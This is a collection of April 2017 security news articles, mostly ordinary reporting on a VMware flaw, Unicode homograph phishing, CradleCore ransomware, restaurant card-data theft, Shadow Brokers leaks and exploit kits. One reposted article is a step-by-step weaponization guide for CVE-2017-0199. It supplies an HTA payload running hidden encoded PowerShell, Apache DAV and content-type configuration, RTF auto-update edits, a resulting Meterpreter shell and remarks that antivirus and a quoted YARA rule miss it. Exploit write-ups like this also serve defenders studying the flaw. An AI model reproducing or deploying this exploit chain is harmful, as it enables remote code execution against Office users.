“The issue is present in the the Customer Experience Improvement Program (CEIP) functionality. If a customer has opted out of CEIP the vulnerability is still present. Also opting out will not remove the vulnerability,” VMware said in its advisory.
The security hole affects vCenter Server 6.0 and 6.5; version 5.5 or other VMware products are not impacted. VMware has advised users to apply the 6.5c and 6.0U3b patches to address the vulnerability.
According to CERT/CC, the deserialization vulnerabilities identified by Wulftange could also affect products from HPE and SonicWall.
This Phishing Attack is Almost Impossible to Detect On Chrome, Firefox and Opera
18.4.2017 thehackernews Phishing
A Chinese infosec researcher has discovered a new "almost impossible to detect" phishing attack that can be used to trick even the most careful users on the Internet.
He warned, Hackers can use a known vulnerability in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon to steal login or financial credentials and other sensitive information from users.
What is the best defence against phishing attack? Generally, checking the address bar after the page has loaded and if it is being served over a valid HTTPS connection. Right?
Okay, then before going to the in-depth details, first have a look at this demo web page (note: you may experience downtime due to high traffic on demo server), set up by Chinese security researcher Xudong Zheng, who discovered the attack.
“It becomes impossible to identify the site as fraudulent without carefully inspecting the site's URL or SSL certificate.” Xudong Zheng said in a blog post.
If your web browser is displaying "apple.com" in the address bar secured with SSL, but the content on the page is coming from another server (as shown in the above picture), then your browser is vulnerable to the homograph attack.
There is another proof-of-concept website created by security experts from Wordfence to demonstrate this browsers' vulnerability. It spoof "epic.com" domain.
Homograph attack has been known since 2001, but browser vendors have struggled to fix the problem. It’s a kind of spoofing attack where a website address looks legitimate but is not because a character or characters have been replaced deceptively with Unicode characters.
Doesn't matter how much aware you're, anyone can fall victim to this "Almost Impossible to Detect" Phishing Attack.
CLICK TO TWEET
Many Unicode characters, which represents alphabets like Greek, Cyrillic, and Armenian in internationalised domain names, look the same as Latin letters to the casual eye but are treated differently by computers with the completely different web address.
For example, Cyrillic "а" (U+0430) and Latin "a" (U+0041) both are treated different by browsers but are displayed "a" in the browser address.
Punycode Phishing Attacks
By default, many web browsers use ‘Punycode’ encoding to represent Unicode characters in the URL to defend against Homograph phishing attacks. Punycode is a special encoding used by the web browser to convert Unicode characters to the limited character set of ASCII (A-Z, 0-9), supported by International Domain Names (IDNs) system.
For example, the Chinese domain "短.co" is represented in Punycode as "xn--s7y.co".
According to Zheng, the vulnerability relies on the fact that web browsers render only Punycode URLs in one language as Unicode (like only Chinese or only Japanese), but they fail if a domain name contains characters from multiple languages.
This loophole allowed the researcher to register a domain name xn--80ak6aa92e.com and bypass protection, which appears as “apple.com” by all vulnerable web browsers, including Chrome, Firefox, and Opera, though Internet Explorer, Microsoft Edge, Apple Safari, Brave, and Vivaldi are not vulnerable.
Here, xn-- prefix is known as an ‘ASCII compatible encoding’ prefix, which indicates web browser that the domain uses ‘punycode’ encoding to represent Unicode characters, and Because Zheng uses the Cyrillic "а" (U+0430) rather than the ASCII "a" (U+0041), the defence approach implemented by web browser fails.
Zheng has reported this issue to the affected browser vendors, including Google and Mozilla in January.
Fake Page (top) and Original Apple.com (bottom), but exactly same URL
While Mozilla is currently still discussing a fix, Google has already patched the vulnerability in its experimental Chrome Canary 59 and will come up with a permanent fix with the release of Chrome Stable 58, set to be launched later this month.
Meanwhile, millions of Internet users who are at risk of this sophisticated hard-to-detect phishing attack are recommended to disable Punycode support in their web browsers in order to temporarily mitigate this attack and identify such phishing domains.
Mitigation For Firefox Users (Not FIX For Chrome)
Firefox uses can follow below-mentioned steps to manually apply temporarily mitigation:
Type about:config in address bar and press enter.
Type Punycode in the search bar.
Browser settings will show parameter titled: network.IDN_show_punycode, double-click or right-click and select Toggle to change the value from false to true.
Unfortunately, there is no similar setting available in Chrome or Opera to disable Punycode URL conversions manually, so Chrome users have to wait for next few weeks to get patched Stable 58 release.
Internet users are always advised to manually type website URLs in the address bar for important sites like Gmail, Facebook, Twitter, Yahoo or banking websites, instead of clicking any link mentioned on some website or email, to prevent against such undetectable attacks.
Who is offering the CradleCore Ransomware as source code?
18.4.2017 securityaffairs Ransomware
CradleCore ransomware is a malware offered in the underground as a source code, instead of the classic ransomware-as-a-service (RaaS) model.
According to the experts at Forcepoint, the author is offering the malware in many Tor-based crime forums as source code allowing crooks to request a customized version of the code.
The CradleCore ransomware is offered by the author as a C++ source code along with the necessary PHP web server scripts and a payment panel, the malware goes for 0.35 Bitcoin (around $400) but the price is negotiable.
“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then the will the developers consider selling the source code.” reads the analysis published by Forcepoint.
CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”
According to the experts, this model of sale will lead to the development of new variants derived from CradleCore.
The ransomware is offered with a relatively complete feature set, it uses Blowfish for file encryption and allows offline encryption too.
The malicious code implements an anti-sandbox mechanism and communicates to command and control server via a Tor2Web gateway.
Once infected a system, the CradleCore ransomware encrypts files and to drops a ransom note on the system. When the malware encrypts the files it appends the .cradle extension to them.
Experts from Forcepoint that analyzed the readme file, believe that the author of the malware is a developer without a significant experience in malware coding.
The researchers discovered more about the author by conducting further analysis on the advertisement site for CradleCore ransomware.
“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.
“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.
Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”
Of course, this means that the owner of the clearnet site that is used to sell the ransomware is linked to a freelance C++ developer, but there is no proof that he is also the coder.
Concluding Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.
“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.
Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC)
18.4.2017 securityaffairs Exploit
The Security expert David Routin (@Rewt_1) has detailed a step by step procedure to exploit the recently patched cve-2017-0199 vulnerability exploited in Windows attacks in the wild.
Introduction
Since several days the security community has been informed thanks to FireEye publication of different malware campaigns (Dridex…) leveraging the CVE-2017-0199.
Several other publications were related to this vulnerability but no working exploit was published.
After digging a while I found the way to exploit this vulnerability in an easy way, which seems to be a bit different than the current works already done by other researchers.
I decided to publish this work as Microsoft officially published a patch on 11 of Apr 2017.
Technical background
It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link once loaded in the document.
What is amazing is that if you try to include HTA link as an OLEv2 object it will be executed once (at the creation) but WinWord will return an error like:
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have had to Link it with file + create icon but we want to be stealth and to have autorun right ?)
After thinking a while I started by thinking how to handle a real, not malicious OLE object link to a remote RTF file… To achieve i had to play a little bit with content-type and DAV module in Apache to serve my file in the “proper” Microsoft Office expected way… (this will be discussed in next chapters).
From there, I will have a valid embedded Object link automatically updated after each open of my document!
Next step? Modify the document at the source with my payload in HTA!?!
In this scenario, I was able to:
– Create a dynamic OLEv2 object link for a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated if I wanted to create a direct link to HTA document
Another issue? The OLE object needed to be activated automatically!
I had much help to solve all these issues relaying on different articles in the reference part! Thanks to Didier Stevens blog, Vincent Yiu (mainly inspired by its article), Nvisio labs, FireEye and obviously… Microsoft 🙂
Step 1
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let’s call it “ms.hta”
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2
Create a simple RTF document using Winword with the any random content. (in our example the string “This is my official and legit content”)
Call it “ms.rtf”
Step 3
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html
Now we have to configure Apache to be able to include the ms.rtf as a link
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
The following directive will:
– Add “Content-Type application/rtf to all files in /ms
– Allow the PROPFIND request performed by Microsoft Office
Modify virtualhost and include:
<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
service apache2 restart
Step 4
Create a simple RTF document using Winword “exploit.rtf” This will be our exploit !
Insert -> Object
CVE-2017-0199 Creation of OLEv2 external link
After clicking OK you will get the content of the “ms.rtf” file which just contains a random string..
Save the file as “exploit.rtf”
CVE-2017-0199 Olev2 link object created
At this step we can close Winword and go to the next step for changing the content of ms.rtf with the HTA payload…
Step 5
The following step will :
– change the ms.rtf that we have included with the custom HTA payload
– The web server will send a “application/hta” content-type… this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload
cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf
vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:
<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>
service apache2 restart
Step 6
At this step, if the user opens the “exploit.rtf” file he will have to double click on the link object to launch the attack…
If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:
to
\object\objautlink\objupdate\rsltpict……………………..
At this step the exploit is built.
Exploitation:
Once the user open the document the OLE object is updated through the link and mshta is execute thanks to the application/hta content-type delivered by the server
Result: code is executed!
Meterpreter is here!
We don’t care about the warning as the code was already executed…
CVE-2017-0199 Exploited ! warning after execution
Detection using current AV/published YARA rules
From my personal tests it seems that this method is not currently catched by AV (Defender already have signature for CVE-2017-0199)
Additionnally current published yara rules does not match this exploit
rule rtf_objdata_urlmoniker_http {
strings:
$header = “{\\rtf1”
$objdata = “objdata 0105000002000000” nocase
$urlmoniker = “E0C9EA79F9BACE118C8200AA004BA90B” nocase
$http = “68007400740070003a002f002f00” nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}
Indeed urlmoniker does not match, which will never trigger this Yara rule.
References
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
Cybercriminals Steal Card Data From Shoney's Restaurants
18.4.2017 securityweek Incindent
Cybercriminals managed to steal payment card data from nearly 40 Shoney’s restaurants after planting malware on their point-of-sale (PoS) systems.
Security blogger Brian Krebs learned from his sources in the financial industry that a fraud pattern had been spotted on cards used at locations of the Nashville, Tennessee-based restaurant chain. Shortly after Krebs published a blog post on Friday, Best American Hospitality Corp. confirmed that some of the Shoney's corporate affiliated restaurants it manages and operates had been hit by a data breach.
The company hired Kroll Cyber Security to investigate the incident. The security firm determined that hackers had remotely installed malware on payment processing systems at tens of Shoney’s restaurants.
The malware was designed to steal data such as cardholder name, card number, expiration date and internal verification code as it was being routed through the infected device. Investigators determined that in some cases the malware may not have obtained cardholder names.
Kroll’s investigation showed that some of the impacted locations were breached on December 27, 2016, while others were first compromised on January 11. Best American Hospitality is confident that the breach was contained by March 6.
As of last year, there were roughly 150 company-owned and franchised Shoney's restaurants across 17 U.S. states. Best American Hospitality said the breach affected 37 locations in South Carolina, Tennessee, Louisiana, Alabama, Georgia, Mississippi, Virginia, Missouri, Florida and Arkansas.
Several other major restaurant chains reported suffering data breaches in the past months, including CiCi’s, Arby’s, Wendy’s and Noodles & Company.
IHG warns of card-stealing malware at front desks
In addition to restaurants, several major hotel chains also reported being hit by card-stealing malware. One of them is InterContinental Hotels Group (IHG), which in early February confirmed that systems processing payments for bars and restaurants at 12 of the properties it manages had been compromised.
Now, IHG has informed customers that it has identified malware which may have stolen data from cards used at hotel front desks. The malware is believed to have stolen data between September 29 and December 29, 2016, but the company only received confirmation that the threat had been neutralized in February and March, when the affected properties were investigated.
CradleCore Ransomware Sold as Source Code
18.4.2017 securityweek Ransomware
The author of a new piece of ransomware is selling their creation on underground forums as source code, Forcepoint security researchers have discovered.
Dubbed CradleCore, the threat breaks from the ransomware-as-a-service (RaaS) business model that many miscreants have adopted lately, and allows “customers” to take advantage of customizable source code.
The ransomware is provided as a C++ source code, paired with the necessary PHP web server scripts and a payment panel. According to Forcepoint, the malware emerged on several Tor-based sites some two weeks ago, priced at 0.35 Bitcoin (around $400) but negotiable.
Because the ransomware’s source code is sold directly, the security company expects an increase in the number of variants stemming from CradleCore.
Upon analysis, the security researchers discovered that the malware comes with “a relatively complete feature set,” as it uses Blowfish for file encryption, features anti-sandbox defenses, supports offline encryption, and uses a Tor2Web gateway (onion.link) to communicate with its command and control (C&C) server.
After infecting a system, the ransomware proceeds to encrypt user’s files and to append the .cradle extension to them. When the encryption has been completed, the malware drops a ransom note.
According to Forcepoint, some of the words used in the readme file suggest that CradleCore’s author is not a professional malware developer, but a software developer who decided to take a shot at the ransomware scene.
After tracking the advertisement site for CradleCore to a clearnet site and a Linode-assigned IP address, the security researchers concluded that the author might indeed be a freelance software developer. Information on the developer’s personal website led to the author’s Twitter and LinkedIn accounts, which revealed that it is a C++ programmer.
However, all that Forcepoint can do at the moment is to “link the clearnet site with a freelance C++ developer and with an Onion site offering the CradleCore C++ source code for sale.” Thus, while they can provide a link between the owner of the clearnet site and the malware, they can’t attribute the ransomware to said developer, at least not “without knowledge of whether or not the Linode host itself has been compromised.”
“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.
Microsoft: Latest 'Shadow Brokers' Exploits Already Patched
18.4.2017 securityweek Exploit
The hacker group calling itself “Shadow Brokers” has made public another batch of files allegedly obtained from the NSA-linked threat actor tracked as the Equation Group. Microsoft has assured customers that these new exploits don’t affect up-to-date systems.
The Shadow Brokers recently published a password to a previously leaked file and many believed it would represent the group’s last dump. However, the hackers released another round of files on Friday, including exploits for Windows and IBM’s Lotus Domino platform. The leaked files also appear to show that the Equation Group breached the SWIFT banking network and monitored a number of Middle Eastern banks.
Microsoft has analyzed the latest dump and identified a dozen exploits targeting its Windows operating system. According to the company, some of the vulnerabilities leveraged by these exploits were patched back in 2008, 2009, 2010 and 2014.
Four of the exploits, dubbed EternalBlue, EternalChampion, EternalRomance and EternalSynergy, were addressed by Microsoft with the March 2017 security updates — a majority with the MS17-010 patch. The tech giant also pointed out that the remaining exploits do not work on Windows 7 and later, or Exchange 2010 and later.
Microsoft has not shared any information on how it learned about the vulnerabilities. However, experts believe the NSA itself may have disclosed the flaws to the company.
The Shadow Brokers published the names of the exploits leaked on Friday back in January, when they announced an auction for Windows tools. After seeing the list published in January, the NSA may have decided to alert Microsoft knowing that the exploits would likely be made public at some point.
Follow
Edward Snowden ✔ @Snowden
Microsoft doesn't credit anyone for the report behind the March patch. Was it @NSAGov? If so, it was the right call. Better late than never. https://twitter.com/botherder/status/853153945677684736 …
2:13 PM - 15 Apr 2017
531 531 Retweets 975 975 likes
It’s also worth noting that Microsoft postponed its February 2017 security updates due to an unspecified “last minute issue,” and the March patches contained fixes for several of the Equation Group exploits.
While there has been a lot of speculation as to who might be behind the Shadow Brokers — some say Russia, while others believe it could be an NSA contractor — the hackers continue to claim that their main goal is to make money. They’ve had several sales strategies, including auctions and crowdfunding, but the Bitcoin address they have provided received only 10 bitcoins.
In a brief statement they published on Friday, the hackers suggested that more files could be released this week.
Mění se pravidelné hlášení o chybách, Microsoft zahodil bulletiny
18.4.2017 SecurityWorld Bezpečnost
Desítky let vydával Microsoft pravidelné bezpečnostní bulletiny – hlášení o záplatách a aktualizacích chyb a zranitelností. Šlo o systém pohodlný jak pro uživatele, tak především pro IT administrátory, zodpovědné za zabezpečení sítě a chodu informačních technologií ve firmě.
Firma nyní používá jinou verzi každoměsíčního hlášení, uživatelé však nejsou spokojeni.
„Je to jako učit se znovu chodit, běhat a řídit kolo, najednou,“ říká Chris Goettl, produktový manažer firmy Ivanti.
Microsoft mluvil o zrušení bulletinů již měsíce a jednou dokonce jejich zrušení v průběhu odvolil; vypadá to, že nyní jde skutečně o finální konec.
Bulletiny nahrazuje databáze vyhledávatelná databáze dokumentů, přístupných skrze portál Security Updates Guide (SUG). Obsah databáze lze třídit a filtrovat pomocí konkrétního softwaru, data vydání aktualizace, identifikačním CVE zranitelností, číselným nebo KB označením aktualizace, případně podpůrným dokumentem „knowledge base“.
Předchůdcem SUG byly oblíbené bezpečnostní bulletiny, existující minimálně od roku 1998. Microsoft si na nich dal tak záležet, že je mnozí považovali za laťku, které by měli softwaroví vývojáři dosahovat.
Během včerejších aktualizací, které mimo jiné opravily kritickou zero day zranitelnost ve Wordu, se bulletiny již neobjevily.
Goettl, který na posouzení nového systému počkal do konečného zrušení bulletinů, není ze SUG nijak nadšený.
Dříve se mu SUG nechtěl posuzovat, ale viděl v něm jisté „velké možnosti“. Dnes si však není jistý, zda SUG dokáže dodávat stejnou kvantitu a kvalitu informací jako bulletiny bez toho, aby zbytečně zatěžoval IT administrátory.
„Nebyl jsem si tím jistý, ale doufal jsem, že dostaneme stejné podrobnosti,“ řekl k SUGu.
Ačkoli většina dřívějších dokumentů a informací z bulletinů zůstala v SUGu dostupná, problém je v přístupnosti k těmto online dokumentům.
„Tento měsíc Microsoft vyřešil 46 zranitelností,“ vysvětluje Goettl. „Trvalo mi čtyři hodiny to objevit s pomocí SUGu. Minulý měsíc bylo vyřešeno 136 zranitelností a pomocí bulletinů jsem to zjišťoval dvě hodiny. Takže s bulletiny jsem udělal trojnásobné množství práce za poloviční čas.“
Nelichotivý obrázek.
Goettl viní Microsoft z toho, že administrátorům zbytečně přidělává práci a stěžuje jim přístup k informacím. Protože základem databáze jsou CVE – unikátní identifikátory každé zranitelnosti – musel Goettl pro zjištění podrobných informací otevírat velké množství stránek v prohlížeči.
„Dříve jste prostě navštívili bulletin, řekněme pro Windows 10, a tam byly vypsání vyřešené zranitelnosti a související stránky s KB, vše na jednom místě,“ vysvětluje. „Ale tento měsíc pro 26 vyřešených zranitelností jsem musel otevírat 26 webových stránek. Pro každou jednotlivou zranitelnost.“
„To pro mě bylo lehké zklamání.“
Goettl především nerozumí důvodům Microsoftu. „Nevím, jaký to má pro firmu smysl bulletiny rušit,“ popisuje. Goettl vedl webinář o bezpečnostních aktualizacích zdarma – běžná praxe v Ivanti – a mnozí účastníci sdíleli jeho údiv.
„Nikdo nechápal, proč se Microsoft snaží udělat vyhledávání informací těžší.“
Goettl prozatím doufá, že Microsoft bude naslouchat zákazníkům a udělá v SUGu změny. „Je potřeba další práce. Tímhle to nemůže skončit,“ věří.
Mezitím Ivanti vytvořilo, čemu Goettl říká „umělé bulletiny“, které dodávají informace ze SUGu zákazníkům využívajícím systém pro správu aktualizací Shavlik. Goettl potvrdil, že podobné starší systémy pod Ivanti budou dostávat podobné informace.
The failure of the missile launch by North Korea may have been caused by US cyber attack
17.4.2017 securityaffairs CyberWar
The failure of the missile launch made the North Korea may have been thwarted by a cyber attack powered by the US Cyber Command.
The crisis between the US and North Korea is increasing, Donald Trump warns his military may ‘have no choice’ to strike the rogue state.
According to The Sun, US cyber soldiers may have hacked the control system of the rocket causing the failure of the launch.
The nuclear test ballistic missile exploded within five seconds of the launch, according to the newspaper the US agents have used a stealth malware that caused a massive malfunction.
The launch occurred from near the port city of Sinpo, Kim Jong-un ordered it defiance of President Trump sending a naval task force to the region.
The US naval force in the area, led by the aircraft carrier USS Carl Vinson, is equipped with rockets capable of intercepting missiles, but they were not deployed.
It was a medium-range ballistic rocket, likely a Nodong, the experts highlighted that North Korea is forced to import the high-tech electronics used in its missiles, so it is likely that US hackers compromised the supply chain implanting an undetectable malware.
According to some experts, North Korea is vulnerable to cyber attacks because its scientists have to import electronic hardware.
The experts believe that US cyber units may have detected the launch and sent the instructions to the malware via satellite from the US National Security Agency headquarters in Maryland.
Source; The Sun
Fantasy or reality?
A similar attack requests a huge effort in terms of HUMINT and technical activities, but it is perfectly feasible.
“It is perfectly feasible the US brought down this missile.” said Defence analyst Paul Beaver.
“Their cyber warfare capabilities are now highly advanced.
“As soon as military satellites watching Sinpo detected an imminent launch, a team at the National Security Agency would have got to work.”
“It’s possible for them to have sent a signal directly to the missile from Maryland which effectively zapped it out of the sky.”
“North Korea has had a string of launch failures and it may be no coincidence that they have happened as the US went to cyber war.”
President Trump did not comment the Kim’s missile failure.
Analysts believe that Kim will punish military commanders involved in the failed operation.
Kim has a history of punishing failure with terrible retribution, including executing his own officials with anti-aircraft guns.
Giving a look at the North Korea’s military programme we can notice a long series of technical failures, a part of the intelligence community attribute the incident to cyber attacks powered by the US Cyber Command.
Other ballistic tests failed in the last weeks, medium-range North Korean rockets crashed and exploded.
“Last year a Musudan missile fired to mark the anniversary of the birth of Kim’s grandfather Kim Il-sung blew up so soon after take-off it wrecked its launcher.” reported The Sun.
“In November 2015 an attempt to launch a ballistic missile from a submarine ended in failure when the weapon disintegrated underwater.”
“There are many things that can go wrong but it would be impossible to tell from outside if something had affected the internal guidance or control systems.” said Defence analyst Lance Gatling
“It has been openly mentioned that there is a possibility that the North’s supply chain for components has been deliberately infected, and they might never know.”
Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers
Microsoft published the biannual transparency report – The number of US foreign intelligence surveillance requests more than doubled.
Microsoft shared data included in the biannual transparency report, the IT giant received more than double what the company said it received under the Foreign Intelligence Surveillance Act (FISA) during the preceding six months.
Microsoft Corp announced it had received in the first half of 2016 at least a thousand surveillance requests from the US Government that sought user content for foreign intelligence purposes.
This is the highest number of request Microsoft has listed since 2011, when it began tracking such government surveillance orders.
Privacy advocates in Congress are concerned about such increase and call for reforms to any FISA legislation in order to limit US Government from searching of American data that is incidentally collected during foreign surveillance operations.
FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.
“Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015.” reported the Reuters.
The Microsoft biannual transparency reports consists of the Law Enforcement Requests Report, U.S. National Security Orders Report and Content Removal Requests Report.
“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”
Microsoft biannual transparency report
A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.
Microsoft also released for the first time a national security letter (NSL), a sort of warrantless surveillance order used by the FBI to access data of a customer of the company.
“As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services.” states Microsoft,
Microsoft isn’t the unique company that disclosed an NSL, Twitter and Yahoo in the recent months made the same under a transparency measure of the USA Freedom Act.
Terror EK rising in the threat landscape while Sundown EK drops
17.4.2017 securityaffairs Exploit
The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.
One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.
What’s happening now?
The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.
Last week, Cisco Talos published an analysis of Sundown EK, the expert detailed the improvements of the EK that presented many similarities with the RIG exploit kit.
“Sundown is an exploit kit in transition, it has stopped using calling cards and other easily ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors.” reads the analysis of the Talos group. “The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web.”
The Sundown EK was not sophisticated like other large exploit kits.
Security experts at Talos were noticing a long inactivity of the Sundown EK, also variant of the kit was disappeared from the scene, including Bizarro and Greenflash.
This silence leads the experts into believing that threat actor ceased the operations.
“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.
“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”
Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.
Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).
The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).
Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.
The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.
The compromised websites are leveraged to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.
“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.
Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks
16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.
The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.
Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.
They are believed stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.
"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.
They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."
The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.
Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.
In a statement on its website EastNets rejected the allegations.
"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.
"We can confirm that no EastNets customer data has been compromised in any way."
SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.
"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."
"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."
Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.
Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.
No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.
Cerber Dominates Ransomware Charts
16.4.2017 securityweek Virus
Cerber, one of the most active malware families over the past year, has increased its share of the ransomware market to 87% in the first quarter of 2017, Malwarebytes Labs reports.
The threat accounted for 70% of the ransomware market in January, but increased its presence in February and March, amid a major decrease in Locky attacks, from 12% in January to less than 2% in March, Malwarebytes’ Cybercrime tactics and techniques Q1 2017 report (PDF) reads.
While Locky has been fading away, new ransomware families such as Spora and Sage have managed to grab some market share. Cerber dominates all other threats in its category at the moment, and its market domination is on par with that of the now defunct TeslaCrypt during its most popular timeframe (the first half of 2016).
Over the past several months, Cerber’s operators used a broad range of available distribution methods, ranging from exploit kits to the recently patched Apache Struts 2 vulnerability. The Kovter click-fraud Trojan was observed dropping Cerber earlier this year, after Betabot was dropping it in September 2016.
Cerber’s authors were also focused on improving their creation with the addition of machine learning evasion capabilities, and with improved anti-sandboxing functionality. Recently, Cyphort researchers noticed that Cerber was leveraging process hollowing for infection, where a suspended process is created and the ransomware’s code is injected in it.
“Just like TeslaCrypt, Cerber has risen to the top of the ransomware market, leaving all competitors in its dust. Again, like TeslaCrypt, Cerber can just as easily become yesterday’s news. However, there are a few factors at play with Cerber that could make its future different than that of families like TeslaCrypt and Locky,” Malwarebytes Labs notes.
Cerber is available as a Ransomware as a Service (RaaS), meaning that it is readily available even for cybercriminals without coding knowledge, but who can get involved in the distribution operation. What’s more, the malware features military-grade encryption, offline encrypting, and various other features that makes it attractive for miscreants.
The malware landscape has seen other changes as well during the first quarter of the year, such as the emergence of new macOS malware and backdoors, including a new ransomware dubbed FindZip. Researchers also discovered the first macro malware targeting Macs.
The RIG exploit kit continues to dominate its threat segment and is expected to do so in the future as well, mainly because there are only a few active toolkits, meaning that there is little competition it has to face.
